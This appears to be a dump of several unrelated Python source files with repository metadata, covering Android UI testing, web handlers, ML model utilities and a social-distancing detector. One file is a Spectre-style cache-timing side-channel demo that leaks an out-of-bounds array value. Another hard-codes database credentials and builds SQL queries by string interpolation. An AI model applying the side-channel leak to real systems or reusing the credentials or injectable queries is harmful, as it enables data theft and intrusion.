# Navigate Settings -> Sound -> Phone ringtone -> Vespa -> OK, then verify.
sound = vc.findViewWithText('Sound')
if sound:
    sound.touch()
    vc.dump()
    phoneRingtone = vc.findViewWithText('Phone ringtone')
    if phoneRingtone:
        phoneRingtone.touch()
        vc.dump()
        vespa = vc.findViewWithText('Vespa')
        if vespa:
            vespa.touch()
            ViewClient.sleep(1)
            ok = vc.findViewById('id/button1')
            if ok:
                ok.touch()
                vc.dump()
                vespa = vc.findViewWithText('Vespa')
                # If for some reason the dialog is still there we will have Vespa and OK
                ok = vc.findViewById('id/button1')
                if vespa and not ok:
                    print("OK")
                else:
                    print("FAIL to set ringtone Vespa")
                    sys.exit(1)
            else:
                print("'OK' not found", file=sys.stderr)
        else:
            print("'Phone ringtone' not found", file=sys.stderr)
    else:
        print("'Sound' not found", file=sys.stderr)
|
[
"info@bojanpotocnik.com"
] |
info@bojanpotocnik.com
|
428db1642996487e7b9b0f6c10ead23b07ea7d2f
|
64cd7a8be396ff3f9d4c1284d495ca5fc3bd30b8
|
/gae/handlers/registrations.py
|
d6d16dbd04916c304150edad22f156ecf3647bdc
|
[] |
no_license
|
andrefreitas/learning
|
19aadb4842030e739c8daa9dc7fc1a77aa66649e
|
44bdca0b5c71b2813b6aa4c3cfcf3ff11a7cb5d1
|
refs/heads/master
| 2020-05-30T14:45:05.219696
| 2015-09-24T22:04:30
| 2015-09-24T22:04:30
| 34,902,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
import webapp2
from models import *
from views import template
class RegistrationsHandler(webapp2.RequestHandler):
    """Course-registration endpoint: POST stores one registration,
    GET lists them all."""
    def post(self):
        # Pull the submitted form fields and persist a new entity.
        name = self.request.get('name')
        email = self.request.get('email')
        course = self.request.get('course')
        r = Registration(name=name, email=email, course=course)
        r.put()
        self.response.write(template('confirmation.html'))
    def get(self):
        # Render every stored registration.
        registrations = Registration.all()
        template_values = {"registrations": registrations}
        self.response.write(template('registrations.html', template_values))
|
[
"p.andrefreitas@gmail.com"
] |
p.andrefreitas@gmail.com
|
b72f0285fc8fa50ebaee4beadd95c015d4f60e27
|
895d1a33771c7b2d8678d585ad3964173542a251
|
/combined_dataset/combined_dataset.py
|
891a6932875a3ddf626c320037d53489d11f2489
|
[] |
no_license
|
StrangeCloud9/NameDis
|
f905dab2fc919c4eed44d4c1591bd6d17593c33b
|
ec50586f4d88c423ddbaf1c4f3bb7d2d94c30d4b
|
refs/heads/master
| 2021-01-23T08:49:06.184932
| 2017-09-06T08:47:58
| 2017-09-06T08:47:58
| 102,555,363
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,606
|
py
|
# coding:utf-8
import os
from lxml import html
import re
import pymysql as MySQLdb
import random
# Module-level DB handle shared by all functions below.
# SECURITY(review): credentials are hard-coded in source — move to config/env.
conn = MySQLdb.connect(host='202.120.36.29', port=6033, user='groupleader', passwd='onlyleaders', db='mag-new-160205',
                       charset="utf8")
cursor = conn.cursor()
class Paper:
    """Lightweight record for one publication attributed to an author."""

    def __init__(self, paper_id, title, year, venue_id, affiliation_id,
                 coauthors, label, author):
        # Identity and bibliographic fields.
        self.paper_id, self.title, self.year = paper_id, title, year
        self.venue_id, self.affiliation_id = venue_id, affiliation_id
        # Disambiguation inputs/outputs.
        self.coauthors, self.label, self.author = coauthors, label, author
        # Cluster label assigned later by the disambiguation step.
        self.label_predicted = 0
def get_file_list(dir, file_list):
    """Recursively collect every file path under *dir* into *file_list*.

    The accumulator list is mutated in place and also returned. Paths are
    decoded from GBK (Python 2 era byte-string paths — presumably; confirm
    before running under Python 3, where str has no .decode()).
    """
    if os.path.isfile(dir):
        # Leaf: record the (GBK-decoded) file path.
        file_list.append(dir.decode('gbk'))
    elif os.path.isdir(dir):
        # Branch: recurse into each directory entry.
        for entry in os.listdir(dir):
            get_file_list(os.path.join(dir, entry), file_list)
    return file_list
def generate_paper_instance_list(file):
    """Parse one author's labeled XML file and enrich each publication with
    MAG database info (affiliation, coauthors, venue, year).

    Returns a list of Paper instances, one per resolvable publication.
    """
    # Author name is taken from the file name, lowercased and normalized
    # to alphanumerics with single spaces.
    author_name = file.split('\\')[-1].replace('.xml', '')
    author_name = author_name.lower()
    author_name = re.sub('[^A-Za-z0-9]', ' ', author_name)
    author_name = re.sub('\s{2,}', ' ', author_name)
    tree = html.parse(file)
    root = tree.getroot()
    paper_instance_list = list()
    for node in root.xpath('//publication'):
        label = node.xpath('label')[0].text
        # Normalize the title the same way as the author name.
        title = node.xpath('title')[0].text
        title = title.lower()
        if title[-1] == '.':
            title = title[:-1]
        title = re.sub('[^A-Za-z0-9]', ' ', title)
        title = re.sub('\s{2,}', ' ', title)
        # SECURITY(review): SQL is built by string interpolation of
        # file-derived text — use parameterized queries.
        quest_paper_by_title = 'SELECT PaperID FROM Papers WHERE NormalizedPaperTitle="%s"'
        cursor.execute(quest_paper_by_title % title)
        ps = cursor.fetchall()
        paper_ids = list()
        if len(ps) == 1:
            paper_ids.append(ps[0][0])
        if len(ps) >= 2:
            # Ambiguous title: keep only papers whose author list contains
            # an exact match of this author's name.
            for p in ps:
                quest_author_by_paper = 'SELECT AuthorName FROM Authors INNER JOIN' \
                                        ' (SELECT AuthorID FROM PaperAuthorAffiliations AS PAA WHERE PaperID="%s") AS TB2' \
                                        ' ON Authors.AuthorID = TB2.AuthorID'
                cursor.execute(quest_author_by_paper % p[0])
                authors = cursor.fetchall()
                for author in authors:
                    if author[0] == author_name.lower():
                        paper_ids.append(p[0])
        for paper_id in paper_ids:
            # get affiliation and coauthors
            quest_affiliation = 'SELECT AuthorName,AffiliationID FROM Authors INNER JOIN' \
                                ' (SELECT AuthorID,AffiliationID FROM PaperAuthorAffiliations WHERE PaperID="%s") AS TB ' \
                                'ON Authors.AuthorID = TB.AuthorID'
            cursor.execute(quest_affiliation % paper_id)
            author_affiliations = cursor.fetchall()
            # Locate this author in the paper's author list: first by exact
            # name, then by fuzzy last-name + first-initial matching
            # (handles "first last" vs "last first" orderings).
            himself = None
            for ai in range(len(author_affiliations)):
                if author_affiliations[ai][0] == author_name.lower():
                    himself = ai
                    break
            if himself is None:
                tmp1 = author_name.split()
                for ai in range(len(author_affiliations)):
                    tmp2 = author_affiliations[ai][0].split()
                    if tmp1[-1] == tmp2[-1] and tmp1[0][0] == tmp2[0][0]:
                        himself = ai
                        break
                    elif tmp1[-1] == tmp2[0] and tmp1[0][0] == tmp2[-1][0]:
                        himself = ai
                        break
            # get affiliation (falls back to the last listed author's
            # affiliation when no match was found)
            if himself is None:
                affiliation_id = author_affiliations[-1][1]
            else:
                affiliation_id = author_affiliations[himself][1]
            # get coauthors
            coauthors = set()
            for ai in range(len(author_affiliations)):
                if ai != himself:
                    coauthor_name = author_affiliations[ai][0]
                    coauthors.add(coauthor_name)
            # get venue, title and year (conference venue preferred over
            # journal venue)
            venue_id = None
            year = None
            quest_info_by_paper = 'SELECT NormalizedPaperTitle, ConferenceSeriesIDMappedToVenueName, ' \
                                  'JournalIDMappedToVenueName, PaperPublishYear FROM Papers WHERE PaperID = "%s"'
            cursor.execute(quest_info_by_paper % paper_id)
            rs = cursor.fetchall()
            if len(rs) != 0:
                # fill in paper_venue_dict
                if rs[0][1] is not None:
                    venue_id = rs[0][1]
                elif rs[0][2] is not None:
                    venue_id = rs[0][2]
                year = rs[0][3]
            paper_instance = Paper(paper_id, title, year, venue_id, affiliation_id, coauthors, label, author_name)
            paper_instance_list.append(paper_instance)
    return paper_instance_list
if __name__ == '__main__':
    # Export every author's enriched publications to a per-author text file.
    # NOTE(review): the .encode("utf-8") calls below imply Python 2 byte
    # strings; under Python 3 writing bytes to a text-mode file would fail.
    file_list = get_file_list('./tj_dataset', [])
    avg_pairwise_precision = 0.0
    avg_pairwise_recall = 0.0
    avg_pairwise_f1 = 0.0
    # file_list = ['./tj_dataset/Keith Edwards.xml']
    for file in file_list:
        full_similarity_dict = dict()
        all_papers = generate_paper_instance_list(file)
        # Output file: same name with ".xml" and spaces stripped, ".txt" added.
        f_name = file+".txt"
        f_name = f_name.replace(".xml","")
        f_name =f_name.replace(" ","")
        File = open(f_name,"a")
        cnt = 0
        for paper in all_papers:
            #print (paper.paper_id)
            #print (paper.title)
            #print (paper.year)
            #print (paper.venue_id)
            #print (paper.affiliation_id)
            #print (paper.coauthors)
            #print (paper.author)
            # Comma-join the coauthor names.
            t = ""
            for n in paper.coauthors:
                t+=n
                t+=","
            t = t[:-1]
            t.encode('utf8')
            # Missing venue/affiliation IDs are replaced with random
            # placeholders so every row has a value.
            if(paper.venue_id == None):
                paper.venue_id = str(random.randint(1,2000000))
            if(paper.affiliation_id == None):
                paper.affiliation_id = str(random.randint(1,20000))
            #print (str(cnt)+";"+str(paper.label)+";"+paper.author+";"+t+str(paper.title)+";"+str(paper.venue_id)+";"+str(paper.year)+"\n")
            File.write(str(cnt)+";"+str(paper.label)+";"+paper.author.encode("utf-8")+";"+t.encode("utf8")+";"+str(paper.title)+";"+str(paper.affiliation_id)+";"+str(paper.venue_id)+";"+str(paper.year)+"\n")
            cnt+=1
        File.close()
|
[
"326902993@qq.com"
] |
326902993@qq.com
|
e84a546a9eb69ba590b9d78efab3999ecec10f66
|
743305c980318628b80b972fd467fe099379988c
|
/Modulos/Academica/views.py
|
ed05b65fe5ade8d9ebb03c42af1e6fe82318bad9
|
[] |
no_license
|
Johang74/Gestion-Universidad-Basico
|
7ff02a8b083feca989630c8ce2e1b835bb797936
|
d63b68dad0962c419aeadd50cc542003424a7487
|
refs/heads/master
| 2022-11-17T07:12:33.551184
| 2020-07-18T17:58:20
| 2020-07-18T17:58:20
| 280,685,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from django.shortcuts import render
# Create your views here.
def formulario(request):
    """Render the empty form page."""
    return render(request, 'formulario.html')
def contactar(request):
    # TODO: contact/form-processing endpoint; not implemented yet.
    pass
|
[
"johang0297@gmail.com"
] |
johang0297@gmail.com
|
b069607cd616397c9afb35f5f17d3d06dbaa218e
|
4d8d1b72b531073265d5697a07a019ce55f70547
|
/restore_model.py
|
38ac66e5a67c9a21c6811eb4c0eed3a9b718f388
|
[] |
no_license
|
yjy0625/pix2pix-tf
|
75feb18b917c1fe108412b4476f2193c15fc3cec
|
79073ff8ed4c2d0b803746eae4d497523e66ebf1
|
refs/heads/master
| 2020-03-28T08:53:08.619814
| 2019-02-06T18:40:28
| 2019-02-06T18:40:28
| 147,996,323
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 807
|
py
|
import tensorflow as tf
import tensorflow.contrib.slim as slim
import os
def get_restorer(FLAGS):
    """Build a tf.train.Saver pointed at the latest checkpoint, if any.

    Args:
        FLAGS: parsed flags; reads checkpoint_dir, version and restore.

    Returns:
        (restorer, checkpoint_path): the Saver (None when no checkpoint
        exists yet) and the latest checkpoint path (None likewise).
    """
    checkpoint_dir_path = os.path.join('./', FLAGS.checkpoint_dir, FLAGS.version)
    checkpoint_path = tf.train.latest_checkpoint(checkpoint_dir_path)
    restorer = None
    # Idiom fix: compare to None with identity, not "!=" (PEP 8).
    if checkpoint_path is not None:
        if FLAGS.restore:
            print('----- Restoring from Model -----')
            # Restore only model variables (skips optimizer slots etc.).
            model_variables = slim.get_model_variables()
            restorer = tf.train.Saver(model_variables)
        else:
            restorer = tf.train.Saver()
        print("Model restored from :", checkpoint_path)
    else:
        # No checkpoint yet: ensure the directory exists for future saves.
        if not os.path.exists(checkpoint_dir_path):
            os.makedirs(checkpoint_dir_path)
        print("Model not found. Training from scratch.")
    return restorer, checkpoint_path
|
[
"jingyuny@usc.edu"
] |
jingyuny@usc.edu
|
d6d8f63f4cda415d7c624e8325d5a901be794395
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03399/s953862554.py
|
bc9df3aeb190f77d1e5da24f3410b5437cd2a8a6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
def main():
    """Read four integers from stdin and print the sum of the minimum of
    the first pair and the minimum of the second pair."""
    a, b, c, d = (int(input()) for _ in range(4))
    print(min(a, b) + min(c, d))
if __name__ == "__main__":
    main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d09fd5269e5e9a371ba79ad2612ea62ed9b72c02
|
0abb9d8b66e110b1439ea53fc63ef482465fef71
|
/dbmgr/migrations/0004_auto_20180206_1513.py
|
cf9e3cd2e3d8616a5011bfb5741135716fc9b9c3
|
[] |
no_license
|
sohjunjie/ntu-ureca-us-stock-prediction
|
6bfea7adefabf6a6a60d952675ec2e6f6b361fe5
|
4caa6acd94560b15a632374b116c4e4109e7fded
|
refs/heads/master
| 2020-03-27T21:35:41.155542
| 2018-09-03T06:19:57
| 2018-09-03T06:19:57
| 147,159,695
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-06 15:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: add a unique constraint to
    # ustwitternewsfeed.feedid (BigIntegerField).
    dependencies = [
        ('dbmgr', '0003_newspaperfeed'),
    ]
    operations = [
        migrations.AlterField(
            model_name='ustwitternewsfeed',
            name='feedid',
            field=models.BigIntegerField(unique=True),
        ),
    ]
|
[
"junjie.soh93@gmail.com"
] |
junjie.soh93@gmail.com
|
0b1452ebc0f8f166f42bd1488e7d2622af0c014c
|
b1984d708438c465b2f4a4be09a2ba8861d8e042
|
/test.py
|
54ad6a894b7e2ffa1cdf3d6a3b9912eaba7a778c
|
[] |
no_license
|
marktsai0316/tests
|
176878cc4dca49324e0e5f5ba04da96f1518cec0
|
65d80564e1565efb197543010a591ac747b8427a
|
refs/heads/master
| 2023-04-21T05:24:12.903376
| 2019-06-05T21:19:25
| 2019-06-05T21:19:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
#!/usr/bin/python
import time
from ctypes import *
from operator import itemgetter
# Cache-timing experiment parameters and shared buffers.
page_size = 4096
eviction_len= 8*1024*1024
probe_len = 8192 * page_size # assure every of the 256 accessed addresses gets an own page
c_lines = 12 # count cache lines
s_lines = 64 # size per cache line
c_sets = 8192 # count cache sets
hit_treshold = 1.25 # threshold to distinguish cache hit from miss (miss takes 1.15 time as long to read)
# note on threshold: based on tests, includes operation delay, trimmed to pure "read and store" (no xor etc.)
step_shift = 12
arr_step = 1<<step_shift
arr_size = arr_step<<13
probebuf = bytearray(probe_len)
evictbuf = bytearray(eviction_len)
x_len = 16
x_arr = bytearray(20)
# Fill the victim's lookup array with its own indices (values 0..19).
for i in range(len(x_arr)):
    x_arr[i] = i
def victim_function(x):
    """Victim: bounds-checked read of x_arr whose value indexes probebuf,
    leaving a per-page cache footprint that encodes x_arr[x]."""
    #print("Accessing idx {0} of test array (=value)".format(x))
    # access probe array based on result of x_arr access
    if (x < x_len):
        a = probebuf[x_arr[x] * page_size]
def evict_cache():
    """Touch the large eviction buffer one 64-byte stride at a time to
    push previously cached data out of the cache."""
    a = 0
    step = 64
    for i in range(0, len(evictbuf), step):
        a = evictbuf[i]
def read_idx(idx):
    """Time one read of probebuf page *idx* and return the elapsed seconds;
    a comparatively fast read suggests the page was already cached."""
    addr=idx*page_size
    # measure read
    start = time.perf_counter()
    a = probebuf[addr]
    elapsed = time.perf_counter() - start
    #print("read idx {0}: {1:.12f} seconds".format(idx ,elapsed))
    return elapsed
# Warm up the clock before timing anything.
time.perf_counter()
# fill evictbuf
print("Filling evict buffer, used for cache eviction")
for i in range(len(evictbuf)):
    evictbuf[i] = (i%255) + 1
# fill probebuf
print("Filling probe buffer, used to leak values")
for i in range(len(probebuf)):
    probebuf[i] = (i%255) + 1
# Per-index hit counters; the most-hit index is the leaked value.
res={}
for i in range(256):
    res[i]=0
goodguess=False
attempt=0
while not goodguess:
    attempt += 1
    # train victim
    victim_function(11)
    victim_function(1)
    victim_function(9)
    # flush cache
    print("Round {0} ... flush cache".format(attempt))
    evict_cache()
    ##### here's the place to cache an access to the probe array ######
    victim_function(15)
    # measure read: compare the cold read (e1) against an immediate warm
    # re-read (e2) of the same page.
    for probeidx in range(256):
        testidx=probeidx
        # print("Testing idx {0}".format(testidx))
        e1 = read_idx(testidx)
        e2 = read_idx(testidx)
        if (e1 < e2*hit_treshold):
            print("hit {0}".format(testidx))
            res[testidx] += 1
    # print top5 results
    so = sorted(res.items(), key=itemgetter(1), reverse=True)
    print(so[:5])
    # we abort as soon as the best guess has 2-times as many hits as its successor
    # NOTE(review): the code requires > 20 hits, although an earlier comment
    # said "minimum 10 hits" — confirm the intended threshold.
    if ((so[0][1] > 20) and (so[0][1] > 2*so[1][1])):
        goodguess=True
        result=so[0][0]
print("Value estimated after {0} rounds is: {1}".format(attempt, result))
|
[
"mame8282@googlemail.com"
] |
mame8282@googlemail.com
|
f3ab5d2b31cba0edb5e33649760867797e54a5f0
|
05c15f476044624acaf137390bd28c60ae886aa1
|
/socialdistance.py
|
7efd773238059330157451e78a315b63616231d0
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
vineet019/social-distance
|
d55bada7890017178c96f522af9f4c4f8acea98b
|
7b24da1712e0335c4e51520023fa1ec5af6c66f9
|
refs/heads/master
| 2022-12-16T04:33:04.694168
| 2020-09-24T01:52:36
| 2020-09-24T01:52:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,553
|
py
|
"""
Copyright (C) 2020 Intel Corporation
SPDX-License-Identifier: BSD-3-Clause
"""
import json
from collections import OrderedDict
from itertools import combinations
import cv2
import os
from libs.draw import Draw
from libs.geodist import social_distance, get_crop
from libs.geometric import get_polygon, get_point, get_line
from libs.person_trackers import PersonTrackers, TrackableObject
from libs.validate import validate
from openvino.inference_engine import IENetwork, IECore
class SocialDistance(object):
def __init__(self):
config_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "config.json")
with open(config_file_path) as f:
cfg = json.load(f)
validate(cfg)
self.running = True
self.videosource = cfg.get("video")
self.model_modelfile = cfg.get("pedestrian_model_weights")
self.model_configfile = cfg.get("pedestrian_model_description")
self.model_modelfile_reid = cfg.get("reidentification_model_weights")
self.model_configfile_reid = cfg.get("reidentification_model_description")
self.coords = cfg.get("coords")
# OPENVINO VARS
self.ov_input_blob = None
self.out_blob = None
self.net = None
self.ov_n = None
self.ov_c = None
self.ov_h = None
self.ov_w = None
self.ov_input_blob_reid = None
self.out_blob_reid = None
self.net_reid = None
self.ov_n_reid = None
self.ov_c_reid = None
self.ov_h_reid = None
self.ov_w_reid = None
# PROCESSOR VARS
self.confidence_threshold = .85
self.iterations = 4 # ~ 5 feets
self.trackers = []
self.max_disappeared = 90
self.polygon = None
self.trackers = PersonTrackers(OrderedDict())
self.min_w = 99999
self.max_w = 1
def load_openvino(self):
try:
ie = IECore()
net = IENetwork.from_ir(model=self.model_configfile, weights=self.model_modelfile)
self.ov_input_blob = next(iter(net.inputs))
self.out_blob = next(iter(net.outputs))
self.net = ie.load_network(network=net, num_requests=2, device_name="CPU")
# Read and pre-process input image
self.ov_n, self.ov_c, self.ov_h, self.ov_w = net.inputs[self.ov_input_blob].shape
del net
except Exception as e:
raise Exception(f"Load Openvino error:{e}")
self.load_openvino_reid()
def load_openvino_reid(self):
try:
ie = IECore()
net = IENetwork.from_ir(model=self.model_configfile_reid, weights=self.model_modelfile_reid)
self.ov_input_blob_reid = next(iter(net.inputs))
self.out_blob_reid = next(iter(net.outputs))
self.net_reid = ie.load_network(network=net, num_requests=2, device_name="CPU")
# Read and pre-process input image
self.ov_n_reid, self.ov_c_reid, self.ov_h_reid, self.ov_w_reid = net.inputs[self.ov_input_blob_reid].shape
del net
except Exception as e:
raise Exception(f"Load Openvino reidentification error:{e}")
def config_env(self, frame):
h, w = frame.shape[:2]
self.trackers.clear()
polylist = []
for pair in self.coords:
polylist.append([int(pair[0] * w / 100), int(pair[1] * h / 100)])
self.polygon = get_polygon(polylist)
def get_frame(self):
h = w = None
try:
cap = cv2.VideoCapture(self.videosource)
except Exception as e:
raise Exception(f"Video source error: {e}")
while self.running:
has_frame, frame = cap.read()
if has_frame:
if frame.shape[1] > 2000:
frame = cv2.resize(frame, (int(frame.shape[1] * .3), int(frame.shape[0] * .3)))
elif frame.shape[1] > 1000:
frame = cv2.resize(frame, (int(frame.shape[1] * .8), int(frame.shape[0] * .8)))
if w is None or h is None:
h, w = frame.shape[:2]
print(frame.shape)
self.config_env(frame)
yield frame
else:
self.running = False
return None
def process_frame(self, frame):
_frame = frame.copy()
trackers = []
frame = cv2.resize(frame, (self.ov_w, self.ov_h))
frame = frame.transpose((2, 0, 1))
frame = frame.reshape((self.ov_n, self.ov_c, self.ov_h, self.ov_w))
self.net.start_async(request_id=0, inputs={self.ov_input_blob: frame})
if self.net.requests[0].wait(-1) == 0:
res = self.net.requests[0].outputs[self.out_blob]
frame = _frame
h, w = frame.shape[:2]
out = res[0][0]
for i, detection in enumerate(out):
confidence = detection[2]
if confidence > self.confidence_threshold and int(detection[1]) == 1: # 1 => CLASS Person
xmin = int(detection[3] * w)
ymin = int(detection[4] * h)
xmax = int(detection[5] * w)
ymax = int(detection[6] * h)
if get_line([[xmin, ymax], [xmax, ymax]]).length < self.min_w:
self.min_w = get_line([[xmin, ymax], [xmax, ymax]]).length
elif get_line([[xmin, ymax], [xmax, ymax]]).length > self.max_w:
self.max_w = get_line([[xmin, ymax], [xmax, ymax]]).length
cX = int((xmin + xmax) / 2.0)
cY = int(ymax)
point = get_point([cX, cY])
if not self.polygon.contains(point):
continue
trackers.append(
TrackableObject((xmin, ymin, xmax, ymax), None, (cX, cY))
)
Draw.rectangle(frame, (xmin, ymin, xmax, ymax), "green", 2)
for tracker in trackers:
person = frame[tracker.bbox[1]:tracker.bbox[3], tracker.bbox[0]:tracker.bbox[2]]
try:
person = cv2.resize(person, (self.ov_w_reid, self.ov_h_reid))
except cv2.error as e:
print(f"CV2 RESIZE ERROR: {e}")
continue
person = person.transpose((2, 0, 1)) # Change data layout from HWC to CHW
person = person.reshape((self.ov_n_reid, self.ov_c_reid, self.ov_h_reid, self.ov_w_reid))
self.net_reid.start_async(request_id=0, inputs={self.ov_input_blob: person})
if self.net_reid.requests[0].wait(-1) == 0:
res = self.net_reid.requests[0].outputs[self.out_blob_reid]
tracker.reid = res
self.trackers.similarity(trackers)
if len(self.trackers.trackers) > 0:
track_tuples = list(combinations(self.trackers.trackers.keys(), 2))
for trackup in track_tuples:
l1 = self.trackers.trackers[trackup[0]].bbox
l2 = self.trackers.trackers[trackup[1]].bbox
if l1[3] < l2[3]:
a = (l1[0], l1[3])
b = (l1[2], l1[3])
c = (l2[0], l2[3])
d = (l2[2], l2[3])
else:
c = (l1[0], l1[3])
d = (l1[2], l1[3])
a = (l2[0], l2[3])
b = (l2[2], l2[3])
h, w = frame.shape[:2]
result = social_distance((h, w), a, b, c, d, self.iterations, self.min_w, self.max_w)
if result["alert"]:
xmin, ymin, xmax, ymax = get_crop(l1, l2)
Draw.rectangle(frame, l1, "yellow", 2)
Draw.rectangle(frame, l2, "yellow", 2)
Draw.rectangle(frame, (xmin, ymin, xmax, ymax), "red", 3)
return frame
def render(self, frame):
    """Display *frame* in a resizable window; press 'q' to quit.

    Side effects: opens/updates an OpenCV window and terminates the
    process via exit() when the user presses 'q'.
    """
    # Use one consistent window name so the WINDOW_NORMAL (resizable)
    # flag set by namedWindow actually applies to the window imshow
    # draws into.  The original registered a window named "output" but
    # then drew into a second, implicitly created window "Frame".
    cv2.namedWindow("output", cv2.WINDOW_NORMAL)
    frame = cv2.resize(frame, (960, 540))
    cv2.imshow("output", frame)
    key = cv2.waitKey(1) & 0xFF
    if key == ord("q"):
        exit()
def run(self):
    """Main loop: load the OpenVINO models, then process and display
    every frame produced by the capture source."""
    self.load_openvino()
    for raw_frame in self.get_frame():
        self.render(self.process_frame(raw_frame))
if __name__ == '__main__':
    try:
        sd = SocialDistance()
        sd.run()
    except Exception:
        # A bare print(exception) loses the traceback, which makes
        # failures inside the frame pipeline very hard to diagnose.
        import traceback
        traceback.print_exc()
|
[
"mateo.guzman@intel.com"
] |
mateo.guzman@intel.com
|
82122190857142b5874736d7b35ee3e46af75abd
|
1421d61938dafd86bf8195d0e24acb454e10ddb4
|
/env/bin/easy_install
|
84515a2c52d9864d43279b66c3975d52ed18078c
|
[
"MIT"
] |
permissive
|
EitanAugust/bme590hrm
|
61cd9df1a37347ef545f4430fae907b2e5856b7b
|
c8be75c44e124ee8a25d4cf0e1a17f739a8b5a58
|
refs/heads/master
| 2021-01-25T10:49:39.899559
| 2018-03-02T03:50:50
| 2018-03-02T03:50:50
| 123,371,359
| 0
| 0
| null | 2018-03-02T03:50:51
| 2018-03-01T02:34:02
|
Python
|
UTF-8
|
Python
| false
| false
| 287
|
#!/Users/eitanaugust/Documents/BME_590_Python/bme590hrm/env/bin/python3
# -*- coding: utf-8 -*-
# NOTE: auto-generated setuptools console-script wrapper for
# `easy_install`; regenerated on (re)install — do not hand-edit.
import re
import sys

from setuptools.command.easy_install import main

if __name__ == '__main__':
    # Strip a trailing "-script.py"/"-script.pyw"/".exe" suffix from
    # argv[0] so easy_install reports its own name cleanly (Windows
    # installs append those suffixes to the launcher).
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"eitanaugust@Eitans-MacBook-Pro.local"
] |
eitanaugust@Eitans-MacBook-Pro.local
|
|
e9b6db9a20f3e7de962bd3db279279e0f855907b
|
d9b59a931808a33703f80dee957f2fcbb19c9691
|
/blackout_data/time_between.py
|
3c091067dcf641de1fa7f3464495af66c27945e2
|
[] |
no_license
|
mahdifirouzi/Cascade
|
8cfa6f9d06a1428a4385046814e9e640404d648f
|
f75e97bcc34ecd1f57bbc0bb1b33e44d313aab8a
|
refs/heads/master
| 2023-03-18T17:38:46.820688
| 2011-09-06T21:03:18
| 2011-09-06T21:03:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 515
|
py
|
#!/usr/bin/python
"""Compute the number of days between consecutive events in a CSV of
dated records and write the gap series to a text file.

Usage: time_between.py <input.csv> <output.txt>
"""
import csv_reader
import sys
import os
import datetime
import numpy

reader = csv_reader.Reader(sys.argv[1])
data = reader.get_columns(['year', 'month', 'day', 'Northeast'])

# Walk consecutive row pairs and record the day gap between them.
days_between = []
for row, next_row in zip(data[:-1], data[1:]):
    current = datetime.date(int(row[0]), int(row[1]), int(row[2]))
    following = datetime.date(int(next_row[0]), int(next_row[1]), int(next_row[2]))
    days_between.append((following - current).days)

numpy.savetxt(sys.argv[2], days_between)
|
[
"aavardaro@gmail.com"
] |
aavardaro@gmail.com
|
80c34a1e44e07c68d76c231b58ed93ad3b7d7d09
|
12cad3e1f1ee44f1d74c3843c821fbe44c59c353
|
/example.py
|
fa265995ed1b757bc941c981d6ea6e57ef0ace14
|
[] |
no_license
|
DarrylEgbertNangoi-GitHub/CourseraIntroduction
|
a9d5bccb94e927ca8e20230517d2eb9560da7747
|
d780266fee3d07cd79d77a4cf62e1c95bd640779
|
refs/heads/main
| 2023-03-19T01:49:10.986096
| 2021-03-08T09:52:47
| 2021-03-08T09:52:47
| 345,601,082
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
def git_opeation():
    """Print a message confirming the file is being added upstream.

    (Name typo kept as-is: it is the function's public identifier.)
    """
    message = "I am adding example.py file to the remote repository."
    print(message)


git_opeation()
|
[
"darryl.nangoi@binus.ac.id"
] |
darryl.nangoi@binus.ac.id
|
4b9a9e21bf5314a39049967c13d1cf3f98b46bc5
|
a6d2e07eea20f63579d6cd31044d26c7f786b8e4
|
/lib/model/train_val.py
|
e547fdaf8bb316d5deead1842c64c910020fb862
|
[] |
no_license
|
gaobb/CASD
|
4b0d882d4d7e12d3e8cef7f6842da6e226bc4c3d
|
9e45a282992a9411b1790f5009353716cb649626
|
refs/heads/master
| 2023-08-22T07:44:57.510863
| 2021-10-19T03:06:59
| 2021-10-19T03:06:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,513
|
py
|
# --------------------------------------------------------
# Tensorflow Faster R-CNN
# Licensed under The MIT License [see LICENSE for details]
# Written by Xinlei Chen and Zheqi He
# --------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorboardX as tb
from model.config import cfg
import roi_data_layer.roidb as rdl_roidb
from roi_data_layer.layer import RoIDataLayer
import utils.timer
try:
import cPickle as pickle
except ImportError:
import pickle
import torch
import torch.optim as optim
import numpy as np
import os
import glob
import time
import torch.nn.functional as F
from torch import nn
def update_learning_rate(optimizer, cur_lr, new_lr):
    """Set every param group of *optimizer* to *new_lr*.

    No-op when the learning rate is unchanged.  The previous version
    also computed the old/new ratio (via _get_lr_change_ratio) and
    collected the parameter keys but never used either, so that dead
    code has been removed.
    """
    if cur_lr != new_lr:
        for param_group in optimizer.param_groups:
            param_group['lr'] = new_lr
def _get_lr_change_ratio(cur_lr, new_lr):
eps = 1e-10
ratio = np.max(
(new_lr / np.max((cur_lr, eps)), cur_lr / np.max((new_lr, eps)))
)
return ratio
def scale_lr(optimizer, scale):
